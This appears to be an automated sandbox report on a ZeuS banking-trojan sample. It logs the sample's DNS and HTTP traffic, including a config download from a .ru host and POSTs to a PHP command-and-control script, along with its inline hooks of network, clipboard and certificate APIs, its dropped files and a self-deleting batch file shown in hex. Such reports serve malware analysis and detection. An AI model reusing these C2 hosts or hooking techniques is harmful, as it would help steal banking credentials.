Dec 1, 2011 15:18:47.494621038 CET | 192.168.0.10 | 195.186.1.121 | 0x78d9 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001)
Dec 1, 2011 15:18:48.225858927 CET | 192.168.0.10 | 195.186.1.121 | 0xa7b7 | Standard query (0) | sexsecret.com | A (IP address) | IN (0x0001)
+ DNS Answer
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Dec 1, 2011 15:18:17.929677010 CET | 195.186.1.121 | 192.168.0.10 | 0x17ee | No error (0) | baygleefacfif.nightmail.ru | | 194.186.88.59 | A (IP address) | IN (0x0001)
Dec 1, 2011 15:18:47.639733076 CET | 195.186.1.121 | 192.168.0.10 | 0x78d9 | No error (0) | www.google.com | | 74.125.39.99 | A (IP address) | IN (0x0001)
Dec 1, 2011 15:18:48.430505037 CET | 195.186.1.121 | 192.168.0.10 | 0xa7b7 | No error (0) | sexsecret.com | | 184.168.213.44 | A (IP address) | IN (0x0001)
+ HTTP
Timestamp Source Port Dest Port Source IP Dest IP Header
Dec 1, 2011 15:18:18.188780069 CET 1079 80 192.168.0.10 194.186.88.59 GET /profi.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: baygleefacfif.nightmail.ru
Cache-Control: no-cache
Dec 1, 2011 15:18:18.532304049 CET 80 1079 194.186.88.59 192.168.0.10 HTTP/1.1 200 OK
Server: nginx
Date: Thu, 01 Dec 2011 14:26:29 GMT
Content-Type: application/octet-stream
Content-Length: 105490
Last-Modified: Thu, 01 Dec 2011 13:07:45 GMT
Connection: close
Accept-Ranges: bytes
Dec 1, 2011 15:18:47.668677092 CET 1080 80 192.168.0.10 74.125.39.99 GET /webhp HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.google.com
Cache-Control: no-cache
Dec 1, 2011 15:18:47.939644098 CET 80 1080 74.125.39.99 192.168.0.10 HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 14:26:59 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=89b343a8cb6b37c1:FF=0:TM=1322749619:LM=1322749619:S=7r6cvg9UyOg4A3o9; expires=Sat, 30-Nov-2013 14:26:59 GMT; path=/; domain=.google.com
Set-Cookie: NID=53=FJGoJsaEBLT8dWO9QrAgQMtQBsDEBiC1MtU37612_Owu2zDaTTh30f20TBvMoiAbnP4d8UQVApjsZqCWWBB0eKvmFpQUVBQ0SbjUvbm-xgQkPENTqBpI7pRHodbAdxki; expires=Fri, 01-Jun-2012 14:26:59 GMT; path=/; do
Dec 1, 2011 15:18:48.438009024 CET 1081 80 192.168.0.10 184.168.213.44 POST /store/includes/ext/red.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: sexsecret.com
Content-Length: 293
Connection: Keep-Alive
Cache-Control: no-cache
Dec 1, 2011 15:18:49.280440092 CET 80 1081 184.168.213.44 192.168.0.10 HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 14:27:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
Dec 1, 2011 15:18:49.514885902 CET 1081 80 192.168.0.10 184.168.213.44 POST /store/includes/ext/red.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: sexsecret.com
Content-Length: 206
Connection: Keep-Alive
Cache-Control: no-cache
Dec 1, 2011 15:18:50.054022074 CET 80 1081 184.168.213.44 192.168.0.10 HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 14:27:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
Hooks
+ User Modules
+ Hook Summary
Function Name Hook Type Active in Processes
GetFileAttributesExW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetUpdateRect INLINE wscntfy.exe, explorer.exe, ctfmon.exe
CallWindowProcA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
CallWindowProcW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
EndPaint INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetUpdateRgn INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetDCEx INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetCapture INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefWindowProcW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetMessageA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetMessageW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefDlgProcA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetDC INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefDlgProcW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefWindowProcA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetClipboardData INLINE wscntfy.exe, explorer.exe, ctfmon.exe
OpenInputDesktop INLINE wscntfy.exe, explorer.exe, ctfmon.exe
PeekMessageA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
PeekMessageW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
RegisterClassW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
RegisterClassA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetWindowDC INLINE wscntfy.exe, explorer.exe, ctfmon.exe
ReleaseDC INLINE wscntfy.exe, explorer.exe, ctfmon.exe
SetCapture INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefMDIChildProcA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefMDIChildProcW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefFrameProcA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
DefFrameProcW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
RegisterClassExW INLINE wscntfy.exe, explorer.exe, ctfmon.exe
TranslateMessage INLINE wscntfy.exe, explorer.exe, ctfmon.exe
BeginPaint INLINE wscntfy.exe, explorer.exe, ctfmon.exe
RegisterClassExA INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetCursorPos INLINE wscntfy.exe, explorer.exe, ctfmon.exe
GetMessagePos INLINE wscntfy.exe, explorer.exe, ctfmon.exe
SwitchDesktop INLINE wscntfy.exe, explorer.exe, ctfmon.exe
SetCursorPos INLINE wscntfy.exe, explorer.exe, ctfmon.exe
ReleaseCapture INLINE wscntfy.exe, explorer.exe, ctfmon.exe
ZwCreateThread INLINE wscntfy.exe, explorer.exe, ctfmon.exe
LdrLoadDll INLINE wscntfy.exe, explorer.exe, ctfmon.exe
NtCreateThread INLINE wscntfy.exe, explorer.exe, ctfmon.exe
closesocket INLINE explorer.exe
send INLINE explorer.exe
WSASend INLINE explorer.exe
PFXImportCertStore INLINE explorer.exe
InternetReadFile INLINE explorer.exe
HttpSendRequestA INLINE explorer.exe
HttpSendRequestW INLINE explorer.exe
InternetQueryDataAvailable INLINE explorer.exe
InternetReadFileExA INLINE explorer.exe
HttpSendRequestExA INLINE explorer.exe
HttpQueryInfoA INLINE explorer.exe
HttpSendRequestExW INLINE explorer.exe
InternetCloseHandle INLINE explorer.exe
+ Processes
+ Process: wscntfy.exe, Module: kernel32.dll
Function Name Hook Type New Data
GetFileAttributesExW INLINE 0xE9 0x9C 0xCE 0xE7 0x79 0x92
+ Process: wscntfy.exe, Module: USER32.dll
Function Name Hook Type New Data
GetUpdateRect INLINE 0xE9 0x9E 0xE5 0x5B 0xB2 0x26
CallWindowProcA INLINE 0xE9 0x9D 0xD6 0x64 0x48 0x86
CallWindowProcW INLINE 0xE9 0x9E 0xEC 0xC5 0x51 0x16
EndPaint INLINE 0xE9 0x95 0x58 0x8C 0xCA 0xA6
GetUpdateRgn INLINE 0xE9 0x95 0x55 0x56 0x66 0x66
GetDCEx INLINE 0xE9 0x90 0x00 0x09 0x95 0x56
GetCapture INLINE 0xE9 0x9D 0xDE 0xE8 0x82 0x26
DefWindowProcW INLINE 0xE9 0x9B 0xB4 0x46 0x62 0x26
GetMessageA INLINE 0xE9 0x95 0x54 0x4A 0xA1 0x16
GetMessageW INLINE 0xE9 0x99 0x91 0x18 0x86 0x66
DefDlgProcA INLINE 0xE9 0x92 0x2F 0xF0 0x0B 0xB6
GetDC INLINE 0xE9 0x92 0x29 0x9D 0xD4 0x46
DefDlgProcW INLINE 0xE9 0x92 0x26 0x6B 0xB3 0x36
DefWindowProcA INLINE 0xE9 0x99 0x9C 0xC2 0x2E 0xE6
GetClipboardData INLINE 0xE9 0x98 0x80 0x04 0x44 0x46
OpenInputDesktop INLINE 0xE9 0x9C 0xC3 0x30 0x02 0x26
PeekMessageA INLINE 0xE9 0x99 0x92 0x27 0x75 0x56
PeekMessageW INLINE 0xE9 0x90 0x0C 0xC8 0x86 0x66
RegisterClassW INLINE 0xE9 0x93 0x3E 0xE4 0x4F 0xF6
RegisterClassA INLINE 0xE9 0x9C 0xC7 0x70 0x08 0x86
GetWindowDC INLINE 0xE9 0x90 0x0E 0xEC 0xCB 0xB6
ReleaseDC INLINE 0xE9 0x9D 0xD1 0x1D 0xD4 0x46
SetCapture INLINE 0xE9 0x9B 0xB0 0x05 0x53 0x36
DefMDIChildProcA INLINE 0xE9 0x91 0x10 0x0F 0xF8 0x86
DefMDIChildProcW INLINE 0xE9 0x93 0x37 0x7E 0xE7 0x76
DefFrameProcA INLINE 0xE9 0x9D 0xD0 0x0F 0xF7 0x76
DefFrameProcW INLINE 0xE9 0x9B 0xB9 0x9E 0xE8 0x86
RegisterClassExW INLINE 0xE9 0x9F 0xF3 0x34 0x43 0x36
TranslateMessage INLINE 0xE9 0x9D 0xDE 0xEC 0xC4 0x46
BeginPaint INLINE 0xE9 0x9F 0xFC 0xCC 0xC9 0x96
RegisterClassExA INLINE 0xE9 0x98 0x8B 0xB7 0x77 0x76
GetCursorPos INLINE 0xE9 0x93 0x3C 0xC7 0x7F 0xF6
GetMessagePos INLINE 0xE9 0x9E 0xEC 0xC7 0x7C 0xC6
SwitchDesktop INLINE 0xE9 0x94 0x48 0x8F 0xF1 0x16
SetCursorPos INLINE 0xE9 0x91 0x1E 0xEB 0xB5 0x56
ReleaseCapture INLINE 0xE9 0x9E 0xEE 0xE5 0x53 0x36
+ Process: wscntfy.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwCreateThread INLINE 0xE9 0x93 0x33 0x3B 0xB7 0x71
LdrLoadDll INLINE 0xE9 0x99 0x94 0x42 0x27 0x71
NtCreateThread INLINE 0xE9 0x93 0x33 0x3B 0xB7 0x71
+ Process: explorer.exe, Module: USER32.dll
Function Name Hook Type New Data
GetUpdateRect INLINE 0xE9 0x9E 0xE5 0x5B 0xB2 0x2B
CallWindowProcA INLINE 0xE9 0x9D 0xD6 0x64 0x48 0x8B
CallWindowProcW INLINE 0xE9 0x9E 0xEC 0xC5 0x51 0x1B
EndPaint INLINE 0xE9 0x95 0x58 0x8C 0xCA 0xAB
GetUpdateRgn INLINE 0xE9 0x95 0x55 0x56 0x66 0x6B
GetDCEx INLINE 0xE9 0x90 0x00 0x09 0x95 0x5B
GetCapture INLINE 0xE9 0x9D 0xDE 0xE8 0x82 0x2B
DefWindowProcW INLINE 0xE9 0x9B 0xB4 0x46 0x62 0x2B
GetMessageA INLINE 0xE9 0x95 0x54 0x4A 0xA1 0x1B
GetMessageW INLINE 0xE9 0x99 0x91 0x18 0x86 0x6B
DefDlgProcA INLINE 0xE9 0x92 0x2F 0xF0 0x0B 0xBB
GetDC INLINE 0xE9 0x92 0x29 0x9D 0xD4 0x4B
DefDlgProcW INLINE 0xE9 0x92 0x26 0x6B 0xB3 0x3B
DefWindowProcA INLINE 0xE9 0x99 0x9C 0xC2 0x2E 0xEB
GetClipboardData INLINE 0xE9 0x98 0x80 0x04 0x44 0x4B
OpenInputDesktop INLINE 0xE9 0x9C 0xC3 0x30 0x02 0x2B
PeekMessageA INLINE 0xE9 0x99 0x92 0x27 0x75 0x5B
PeekMessageW INLINE 0xE9 0x90 0x0C 0xC8 0x86 0x6B
RegisterClassW INLINE 0xE9 0x93 0x3E 0xE4 0x4F 0xFB
RegisterClassA INLINE 0xE9 0x9C 0xC7 0x70 0x08 0x8B
GetWindowDC INLINE 0xE9 0x90 0x0E 0xEC 0xCB 0xBB
ReleaseDC INLINE 0xE9 0x9D 0xD1 0x1D 0xD4 0x4B
SetCapture INLINE 0xE9 0x9B 0xB0 0x05 0x53 0x3B
DefMDIChildProcA INLINE 0xE9 0x91 0x10 0x0F 0xF8 0x8B
DefMDIChildProcW INLINE 0xE9 0x93 0x37 0x7E 0xE7 0x7B
DefFrameProcA INLINE 0xE9 0x9D 0xD0 0x0F 0xF7 0x7B
DefFrameProcW INLINE 0xE9 0x9B 0xB9 0x9E 0xE8 0x8B
RegisterClassExW INLINE 0xE9 0x9F 0xF3 0x34 0x43 0x3B
TranslateMessage INLINE 0xE9 0x9D 0xDE 0xEC 0xC4 0x4B
BeginPaint INLINE 0xE9 0x9F 0xFC 0xCC 0xC9 0x9B
RegisterClassExA INLINE 0xE9 0x98 0x8B 0xB7 0x77 0x7B
GetCursorPos INLINE 0xE9 0x93 0x3C 0xC7 0x7F 0xFB
GetMessagePos INLINE 0xE9 0x9E 0xEC 0xC7 0x7C 0xCB
SwitchDesktop INLINE 0xE9 0x94 0x48 0x8F 0xF1 0x1B
SetCursorPos INLINE 0xE9 0x91 0x1E 0xEB 0xB5 0x5B
ReleaseCapture INLINE 0xE9 0x9E 0xEE 0xE5 0x53 0x3B
+ Process: explorer.exe, Module: kernel32.dll
Function Name Hook Type New Data
GetFileAttributesExW INLINE 0xE9 0x9C 0xCE 0xE7 0x79 0x97
+ Process: explorer.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwCreateThread INLINE 0xE9 0x93 0x33 0x3B 0xB7 0x76
LdrLoadDll INLINE 0xE9 0x99 0x94 0x42 0x27 0x76
NtCreateThread INLINE 0xE9 0x93 0x33 0x3B 0xB7 0x76
+ Process: explorer.exe, Module: WS2_32.dll
Function Name Hook Type New Data
closesocket INLINE 0xE9 0x98 0x83 0x38 0x8A 0xA4
send INLINE 0xE9 0x9B 0xBF 0xF7 0x7C 0xC4
WSASend INLINE 0xE9 0x90 0x0D 0xD6 0x60 0x04
+ Process: explorer.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xE9 0x95 0x5F 0xF4 0x4E 0xE4
+ Process: explorer.exe, Module: WININET.dll
Function Name Hook Type New Data
InternetReadFile INLINE 0xE9 0x92 0x2D 0xDD 0xDD 0xD6
HttpSendRequestA INLINE 0xE9 0x92 0x20 0x05 0x52 0x26
HttpSendRequestW INLINE 0xE9 0x99 0x97 0x74 0x45 0x56
InternetQueryDataAvailable INLINE 0xE9 0x97 0x7E 0xE8 0x83 0x36
InternetReadFileExA INLINE 0xE9 0x93 0x36 0x60 0x0F 0xF6
HttpSendRequestExA INLINE 0xE9 0x93 0x33 0x39 0x9B 0xB5
HttpQueryInfoA INLINE 0xE9 0x9A 0xA0 0x0B 0xBB 0xB6
HttpSendRequestExW INLINE 0xE9 0x93 0x3E 0xE9 0x9A 0xA5
InternetCloseHandle INLINE 0xE9 0x9A 0xAD 0xDB 0xB1 0x16
+ Process: ctfmon.exe, Module: USER32.dll
Function Name Hook Type New Data
GetUpdateRect INLINE 0xE9 0x9E 0xE5 0x5B 0xB2 0x26
CallWindowProcA INLINE 0xE9 0x9D 0xD6 0x64 0x48 0x86
CallWindowProcW INLINE 0xE9 0x9E 0xEC 0xC5 0x51 0x16
EndPaint INLINE 0xE9 0x95 0x58 0x8C 0xCA 0xA6
GetUpdateRgn INLINE 0xE9 0x95 0x55 0x56 0x66 0x66
GetDCEx INLINE 0xE9 0x90 0x00 0x09 0x95 0x56
GetCapture INLINE 0xE9 0x9D 0xDE 0xE8 0x82 0x26
DefWindowProcW INLINE 0xE9 0x9B 0xB4 0x46 0x62 0x26
GetMessageA INLINE 0xE9 0x95 0x54 0x4A 0xA1 0x16
GetMessageW INLINE 0xE9 0x99 0x91 0x18 0x86 0x66
DefDlgProcA INLINE 0xE9 0x92 0x2F 0xF0 0x0B 0xB6
GetDC INLINE 0xE9 0x92 0x29 0x9D 0xD4 0x46
DefDlgProcW INLINE 0xE9 0x92 0x26 0x6B 0xB3 0x36
DefWindowProcA INLINE 0xE9 0x99 0x9C 0xC2 0x2E 0xE6
GetClipboardData INLINE 0xE9 0x98 0x80 0x04 0x44 0x46
OpenInputDesktop INLINE 0xE9 0x9C 0xC3 0x30 0x02 0x26
PeekMessageA INLINE 0xE9 0x99 0x92 0x27 0x75 0x56
PeekMessageW INLINE 0xE9 0x90 0x0C 0xC8 0x86 0x66
RegisterClassW INLINE 0xE9 0x93 0x3E 0xE4 0x4F 0xF6
RegisterClassA INLINE 0xE9 0x9C 0xC7 0x70 0x08 0x86
GetWindowDC INLINE 0xE9 0x90 0x0E 0xEC 0xCB 0xB6
ReleaseDC INLINE 0xE9 0x9D 0xD1 0x1D 0xD4 0x46
SetCapture INLINE 0xE9 0x9B 0xB0 0x05 0x53 0x36
DefMDIChildProcA INLINE 0xE9 0x91 0x10 0x0F 0xF8 0x85
DefMDIChildProcW INLINE 0xE9 0x93 0x37 0x7E 0xE7 0x76
DefFrameProcA INLINE 0xE9 0x9D 0xD0 0x0F 0xF7 0x75
DefFrameProcW INLINE 0xE9 0x9B 0xB9 0x9E 0xE8 0x86
RegisterClassExW INLINE 0xE9 0x9F 0xF3 0x34 0x43 0x36
TranslateMessage INLINE 0xE9 0x9D 0xDE 0xEC 0xC4 0x46
BeginPaint INLINE 0xE9 0x9F 0xFC 0xCC 0xC9 0x96
RegisterClassExA INLINE 0xE9 0x98 0x8B 0xB7 0x77 0x76
GetCursorPos INLINE 0xE9 0x93 0x3C 0xC7 0x7F 0xF6
GetMessagePos INLINE 0xE9 0x9E 0xEC 0xC7 0x7C 0xC6
SwitchDesktop INLINE 0xE9 0x94 0x48 0x8F 0xF1 0x16
SetCursorPos INLINE 0xE9 0x91 0x1E 0xEB 0xB5 0x55
ReleaseCapture INLINE 0xE9 0x9E 0xEE 0xE5 0x53 0x36
+ Process: ctfmon.exe, Module: kernel32.dll
Function Name Hook Type New Data
GetFileAttributesExW INLINE 0xE9 0x9C 0xCE 0xE7 0x79 0x92
+ Process: ctfmon.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwCreateThread INLINE 0xE9 0x93 0x33 0x3B 0xB7 0x71
LdrLoadDll INLINE 0xE9 0x99 0x94 0x42 0x27 0x71
NtCreateThread INLINE 0xE9 0x93 0x33 0x3B 0xB7 0x71
+ Sections
+ General
Start time: 06:06:35
Start date: 01/12/2011
Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe
Commandline: not known
Imagebase: 0x400000
File size: 171520 bytes
MD5 hash: FB65104CCD2CA664496234D3F2C2A371
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 4101EF
C:\Documents and Settings\Administrator\Application Data\887021879.log read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 3B182A
C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 41AE9D
C:\Documents and Settings\Administrator\Application Data read attributes and synchronize and generic read synchronous io non alert and open for backup ident false success or wait 1 41B23D
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe read attributes and write attributes and synchronize synchronous io non alert and non directory file false success or wait 1 41B132
C:\Documents and Settings\Administrator\Application Data\Foluv read attributes and write attributes and synchronize synchronous io non alert and non directory file false file is a directory 1 41B132
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei read attributes and write attributes and synchronize synchronous io non alert and non directory file false success or wait 1 41B132
C:\Documents and Settings\Administrator\Application Data\Qiokze read attributes and write attributes and synchronize synchronous io non alert and non directory file false file is a directory 1 41B132
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 C046EA
+ File created
File Path Access Attributes Options Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\887021879.log read attributes and synchronize and generic read and generic write none synchronous io non alert and non directory file success or wait 1 3B187E
C:\Documents and Settings\Administrator\Application Data\Foluv read data or list directory and synchronize normal directory file and synchronous io non alert and open for backup ident success or wait 1 410156
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe read attributes and synchronize and generic read and generic write normal synchronous io non alert and non directory file success or wait 2 4101A7
C:\Documents and Settings\Administrator\Application Data\Qiokze read data or list directory and synchronize normal directory file and synchronous io non alert and open for backup ident success or wait 1 410156
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei read attributes and synchronize and generic read and generic write normal synchronous io non alert and non directory file success or wait 1 4101A7
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat read attributes and synchronize and generic write normal synchronous io non alert and non directory file success or wait 2 41AE2D
+ File written
File Path Offset Length Value Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\887021879.log none 5 31 36 37 39 30 success or wait 1 3B18C1
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe none 171520 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 41AE50
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat none 206 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 success or wait 1 41AE50
+ File read
File Path Offset Length Value Completion Count Source Address
C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe none 171520 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 2 41AEF0
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe BasicInformation 0000000000000000000000000000000000000000000000000000000000000000A000000000000000 success or wait 2 4101EF
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei BasicInformation 00FF93D1CB24CC0100FF93D1CB24CC0100FF93D1CB24CC0100000000000000000000000000000000 success or wait 1 41B14C
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
none query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 270000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 290000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 330000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 340000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 340000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 370000 12288 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe query and write and read and execute and extend size image 5B860000 348160 own pid read write success or wait 1
\BaseNamedObjects\ShimSharedMemory write unknown BD0000 57344 own pid read write success or wait 1
C:\WINDOWS\system32\apphelp.dll write and read and execute commit BE0000 126976 own pid execute success or wait 1
C:\WINDOWS\system32\apphelp.dll query and write and read and execute image 77B40000 139264 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit BE0000 1208320 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe query and read commit BE0000 172032 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and write and read and execute and extend size image BE0000 172032 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit DB0000 1208320 own pid readonly success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit C20000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit C20000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit C20000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit C20000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit C20000 389120 own pid readonly success or wait 1
none query and write and read commit C20000 12288 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1 3B05D3
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1 3B05D3
C:\WINDOWS\system32\shell32.dll read commit 930000 8462336 own pid readonly success or wait 1 3B05D3
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 930000 1056768 own pid execute success or wait 1 3B05D3
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1 3B05D3
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 3E0000 4096 own pid execute success or wait 1 3B05D3
C:\WINDOWS\WindowsShell.Manifest query and read commit 3E0000 4096 own pid readonly success or wait 1 3B05D3
C:\WINDOWS\WindowsShell.Manifest read commit 3E0000 4096 own pid readonly success or wait 1 3B05D3
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1 3B05D3
C:\WINDOWS\system32\comctl32.dll read commit 930000 618496 own pid readonly success or wait 1 3B05D3
\KnownDlls\WS2_32.dll write and read and execute unknown 930000 618496 own pid readonly object name not found 1 3B05D3
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 3B05D3
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 3B05D3
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 3B05D3
\KnownDlls\CRYPT32.dll write and read and execute unknown 71AA0000 32768 own pid read write object name not found 1 3B05D3
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 3B05D3
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 3B05D3
